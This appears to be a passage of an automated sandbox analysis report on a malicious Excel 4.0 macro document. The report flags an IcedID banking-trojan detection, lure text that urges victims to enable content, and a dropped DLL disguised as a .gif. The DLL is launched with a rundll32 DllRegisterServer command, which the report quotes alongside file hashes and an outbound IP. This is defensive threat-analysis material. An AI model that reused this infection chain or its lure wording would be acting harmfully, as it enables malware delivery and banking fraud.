Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000002.2128470783.00000000003F5000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2124747272.0000000000405000.00000004.00000001.sdmp String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
Source: idefje.ekfd.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: rundll32.exe, 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/awscloud
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.amazon.jobs/aws
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.twitch.tv/aws
Source: rundll32.exe, 00000003.00000002.2129710138.0000000002A10000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown HTTPS traffic detected: 197.242.147.47:443 -> 192.168.2.22:49165 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected IcedID
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2324, type: MEMORY
Source: Yara match File source: 3.2.rundll32.exe.7feea7c0000.10.unpack, type: UNPACKEDPE

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: document-1915351743.xls Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
Source: Document image extraction number: 6 Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
Found Excel 4.0 Macro with suspicious formulas
Source: document-1915351743.xls Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: document-1915351743.xls Initial sample: Sheet size: 4930
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd Jump to dropped file
Document contains embedded VBA macros
Source: document-1915351743.xls OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif 21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044
Source: Joe Sandbox View Dropped File: C:\Users\user\idefje.ekfd 21249CE24600B1FEAC26A2A9883F3C6DE299681A924BE281630BC3869F0F4044
Yara signature match
Source: document-1915351743.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-1915351743.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2128541191.0000000001C80000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@3/11@5/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\ADFE0000 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF112.tmp Jump to behavior
Source: document-1915351743.xls OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\idefje.ekfd,DllRegisterServer Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1802[1].gif Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\idefje.ekfd Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior